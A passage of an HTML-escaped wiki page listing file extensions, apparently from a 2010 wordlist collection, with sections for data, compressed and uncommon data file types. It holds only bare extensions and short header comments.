.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
